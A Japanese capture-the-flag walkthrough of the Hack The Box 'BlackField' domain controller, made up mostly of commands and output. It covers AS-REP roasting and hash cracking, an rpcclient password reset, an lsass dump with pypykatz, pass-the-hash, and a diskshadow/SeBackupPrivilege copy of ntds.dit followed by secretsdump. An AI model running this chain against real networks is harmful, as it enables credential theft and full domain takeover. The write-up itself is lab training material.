注意
このWalkthroughはHack The Box(以下、HTB)の問題であるBlackFieldの解説を目的とした記事です。不正アクセス等の違法行為を助長するものではありません。
はじめに
OSがWindowsでHardの問題。Rateが4.9でStaff Pickされている神マシン。
Windows環境で使えるツールを知っている限りほぼ全部使いまくってやった。マシンを攻略するにあたってここまで興奮したのは初めて。
infocard
Walkthrough
User権限を取るまで
autoreconによる調査
確認したファイルで有用そうな情報を記載する。
- _quick_tcp_nmap.txt
空いているポートを見逃すと面倒なのでここだけは外さないように別ツールでもポートスキャンを行い、結果が一致することを確認した。
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2020-07-23 14:48:15Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=9%D=7/23%Time=5F193FD4%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
- enum4linux.txt
ドメイン名が「BLACKFIELD」である様子。
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
- smbclient.txt
ユーザー名のようなフォルダが作成されている。これはユーザーの一覧として使えそう。
$cat smbclient.txt
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
# 権限
[+] Guest session IP: blackfield:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
# profiles$の中身
profiles$ READ ONLY
.\profiles$\*
dr--r--r-- 0 Thu Jun 4 01:47:12 2020 .
dr--r--r-- 0 Thu Jun 4 01:47:12 2020 ..
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AAlleni
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 ABarteski
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 ABekesz
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 ABenzies
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 ABiemiller
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AChampken
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 ACheretei
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 ACsonaki
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AHigchens
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AJaquemai
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AKlado
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AKoffenburger
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AKollolli
dr--r--r-- 0 Thu Jun 4 01:47:11 2020 AKruppe
...(大量のユーザと思われるフォルダ一覧が続く)
ユーザーの一覧からASREPRoastを行う。
ユーザーの一覧は入手したので、ASREPRoastを行ってみる。
事前にsmbclientなどでフォルダの一覧を入手し、 cat list.txt | awk '{print $8}' > users.txtなどで整形しておくこと。
GetNPUsers.py BLACKFIELD/ -format hashcat -usersfile users.txt -outputfile result.hash -dc-ip blackfield
~(snip)~
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
~(snip)~
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
~(snip)~
cat result.hash
$krb5asrep$23$support@BLACKFIELD:e24d006507629a228d3e40e6460b8a2e$e7d75ebe4697d9739263117cf43bba6c4a6b5b107b00ea284265e7ad949756ec84420a81c6013ba23d84d750bb5fb024f9e84f4fe234916ae61a5a9b64483e7d199c54d1496e871012e480f56b1e34e816f44a7228c03e0061668afdb16b9ae70cc97d08e5f6484380ef927d78bd7e459e24c077ef792383f3e535d574264c996787672d2129b2fa7706f3318dc5d47de3746803669f22a94f13d61dec97fb29bd4e76f21c96740ccfd36e2b0623ea52a97d4ecb882da1b130e87fca8e6e06e1a51dc22123b0e8ebe5684966d0a7ed1fbd704c3214f320b26ff2e7d0a7e411d0cb5b55038bb9a6469fe79d4cbeb5
ハッシュが見つかる。
hashcatで辞書攻撃を行う。
ハッシュが手に入ったので辞書攻撃を行い、パスワードの平文を得たいと思う。
適当な辞書を選択し、少しまつ。
hashcat -m18200 '$krb5asrep$23$support@BLACKFIELD:e24d006507629a228d3e40e6460b8a2e$e7d75ebe4697d9739263117cf43bba6c4a6b5b107b00ea284265e7ad949756ec84420a81c6013ba23d84d750bb5fb024f9e84f4fe234916ae61a5a9b64483e7d199c54d1496e871012e480f56b1e34e816f44a7228c03e0061668afdb16b9ae70cc97d08e5f6484380ef927d78bd7e459e24c077ef792383f3e535d574264c996787672d2129b2fa7706f3318dc5d47de3746803669f22a94f13d61dec97fb29bd4e76f21c96740ccfd36e2b0623ea52a97d4ecb882da1b130e87fca8e6e06e1a51dc22123b0e8ebe5684966d0a7ed1fbd704c3214f320b26ff2e7d0a7e411d0cb5b55038bb9a6469fe79d4cbeb5' -a 0 /usr/share/wordlists/rockyou.txt -o result.txt
~(snip)~
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$support@BLACKFIELD:e24d006507629a228d...4cbeb5
Time.Started.....: Sun Aug 30 16:40:19 2020 (17 secs)
Time.Estimated...: Sun Aug 30 16:40:36 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 832.5 kH/s (8.73ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14340096/14344385 (99.97%)
Rejected.........: 0/14340096 (0.00%)
Restore.Point....: 14327808/14344385 (99.88%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $Cah$ -> !carragold!
cat result.txt
$krb5asrep$23$support@BLACKFIELD:e24d006507629a228d3e40e6460b8a2e$e7d75ebe4697d9739263117cf43bba6c4a6b5b107b00ea284265e7ad949756ec84420a81c6013ba23d84d750bb5fb024f9e84f4fe234916ae61a5a9b64483e7d199c54d1496e871012e480f56b1e34e816f44a7228c03e0061668afdb16b9ae70cc97d08e5f6484380ef927d78bd7e459e24c077ef792383f3e535d574264c996787672d2129b2fa7706f3318dc5d47de3746803669f22a94f13d61dec97fb29bd4e76f21c96740ccfd36e2b0623ea52a97d4ecb882da1b130e87fca8e6e06e1a51dc22123b0e8ebe5684966d0a7ed1fbd704c3214f320b26ff2e7d0a7e411d0cb5b55038bb9a6469fe79d4cbeb5:#00^BlackKnight
supportのパスワードは#00^BlackKnightであることがわかる。ただこのアカウントではWinRMを経由したログインができないため、なにか方法を考える必要がある。
supportアカウントを使った調査
このアカウントを使い、全体的に調査をし直す。今まで権限がなかった SYSVOLにREAD ONLYの権限がついている。どう考えても怪しい。
smb関連の調査
smbmap -H blackfield -u support -p '#00^BlackKnight' -d BLACKFIELD
[+] IP: blackfield:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
smblicentでアクセスを行い中身のデータをとりあえずDLする。
接続先を最初はblackfieldにしていたが、だめだったのでこんな感じになっている。なぜ。
smbclient //dc01.blackfield.local/SYSVOL -U blackfield.local/support
Enter BLACKFIELD.LOCAL\support's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 20:13:05 2020
.. D 0 Sun Feb 23 20:13:05 2020
BLACKFIELD.local Dr 0 Sun Feb 23 20:13:05 2020
mg
7846143 blocks of size 4096. 3836818 blocks available
smb: \> mget *
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \BLACKFIELD.local\DfsrPrivate\*
getting file \BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 22 as GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (1.5 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2796 as Registry.pol (3.9 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.0 KiloBytes/sec) (average 1.4 KiloBytes/sec)
getting file \BLACKFIELD.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3764 as GptTmpl.inf (4.5 KiloBytes/sec) (average 2.1 KiloBytes/sec)
smb: \> exit
中身見てもよくわからなかった。ここで無限に時間を消費する。
rpc関連の調査
正直なところ未だにRPCを理解できていない。
が、ググりまくり、フォーラムを見まくるととサービスデスクっぽいアカウントだとパスワード変更できるんじゃね?といったものが目立つ。RPCで情報を抜きつつ試してみる。
rpcclient -U support 10.10.10.192
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
~(snip)~
user:[BLACKFIELD532412] rid:[0x581]
user:[BLACKFIELD996878] rid:[0x582]
user:[BLACKFIELD653097] rid:[0x583]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
rpcclient $> setuserinfo2 audit2020 23 '#i98jO093jlsi38'
rpcclient $> exit
うまく行ったっぽい。
audit2020アカウントを使った調査
audit2020 のパスワードは自由に変えることができることがわかっているので、このアカウントベースで更に調査していく。アカウント名に2020とか入れてるくらいだし、臨時アカウントっぽい。
smbmap -H blackfield -u audit2020 -p '#i98jO093jlsi38' -d BLACKFIELD
[+] IP: blackfield:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
forensicフォルダがREAD ONLYになったので確認しに行く。
smbclient //blackfield/forensic -U blackfield/audit2020
Enter BLACKFIELD\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 22:03:16 2020
.. D 0 Sun Feb 23 22:03:16 2020
commands_output D 0 Mon Feb 24 03:14:37 2020
memory_analysis D 0 Fri May 29 05:28:33 2020
tools D 0 Sun Feb 23 22:39:08 2020
7846143 blocks of size 4096. 3938851 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (1.5 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (24.8 KiloBytes/sec) (average 9.1 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (347.8 KiloBytes/sec) (average 154.4 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (2.7 KiloBytes/sec) (average 130.2 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (5.8 KiloBytes/sec) (average 113.0 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (6.0 KiloBytes/sec) (average 100.1 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (6.9 KiloBytes/sec) (average 90.0 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (15.2 KiloBytes/sec) (average 82.8 KiloBytes/sec)
~(snip)~
ダンプファイルの調査
forensicsフォルダの中身は各種ダンプファイルや調査結果とかが入っているっぽい。その中でもmemory_analysis/lsass.zipが良さそう。lsass.exeのメモリダンプであればmimikatzで解析可能であるため試してみる。
cd memory_analysis
unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
pypykatz lsa minidump ./lsass.DMP
FILE: ======== ./lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== SSP [633ba]==
username
domainname
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
めちゃくちゃうまくいく。これでsvc_backupのNTLMハッシュが手に入ったため、Pass-the-Hashする。
ruby evil-winrm.rb -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i blackfield
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ../Desktop/user.txt
これでユーザーが取れました!
Administrator権限取るまで
取得したユーザー名はsvc_backupなのでバックアップ関連権限の悪用だとわかる。whoamiしてみるとバックアップ関連の権限がついていた。
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
なのでひたすらぐぐってみるとと、色々わかってきたので次の方針で頑張る。
- 結局はバックアップとリストアができるのでWindows上の全ファイルの読み書きが可能。
- であれば今回のケースだとActive Directoryのデータベースファイルである
ntds.ditファイルをダンプしてAdministratorの情報を抜けばいい -
ntds.ditは通常読み取りすらできないファイルなので、バックアップの権限を悪用しシャドーコピー経由でダンプすればいい
シャドーコピー作成
$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i blackfield
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload script.txt
Info: Uploading script.txt to C:\Users\svc_backup\Documents\script.txt
Data: 288 bytes of 288 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type script.txt
{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
}
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 10/2/2020 2:07:07 PM
->
-> set context persistent nowriters
-> set metadata c:\windows\system32\spool\drivers\color\example.cab
-> set verbose on
-> begin backup
-> add volume c: alias mydrive
->
-> create
Alias mydrive for shadow ID {1e9682b9-2eb9-4789-a991-cfb50c6a1547} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {175322cf-2057-4d71-9b3c-7a19a230b712} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis6345.tmp into .cab file example.cab
Querying all shadow copies with the shadow copy set ID {175322cf-2057-4d71-9b3c-7a19a230b712}
* Shadow copy ID = {1e9682b9-2eb9-4789-a991-cfb50c6a1547} %mydrive%
- Shadow copy set: {175322cf-2057-4d71-9b3c-7a19a230b712} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 10/2/2020 2:07:08 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
->
-> expose %mydrive% w:
-> %mydrive% = {1e9682b9-2eb9-4789-a991-cfb50c6a1547}
The shadow copy was successfully exposed as w:\.
-> end backup
->
->
ntds.ditの取得
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeUtils.dll
Info: Uploading SeBackupPrivilegeUtils.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Get-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Set-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Get-SeBackupPrivilege
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\svc_backup\Documents\ntds.dit -Overwrite
レジストリ取得
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSTEM c:\Users\svc_backup\Documents\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls
Directory: C:\Users\svc_backup\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/2/2020 2:11 PM 18874368 ntds.dit ←このファイルをダウンロード
-a---- 10/2/2020 2:06 PM 217 script.txt
-a---- 10/2/2020 2:09 PM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 10/2/2020 2:09 PM 16384 SeBackupPrivilegeUtils.dll
-a---- 10/2/2020 2:12 PM 17547264 system.hive ←このファイルをダウンロード
impacket-secretdumpにて認証情報のダンプを行う
impacket-secretsdump -ntds ntds.dit -system system.hive -hashes lmhash:nthash LOCAL -outputfile output.txt
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
~(snip)~
AdministratorのNTLMハッシュがわかるためPass-the-Hashを行う
evil-winrm -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i blackfield 127 ⨯
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
最後に
最高のマシンだった。ごちそうさまでした。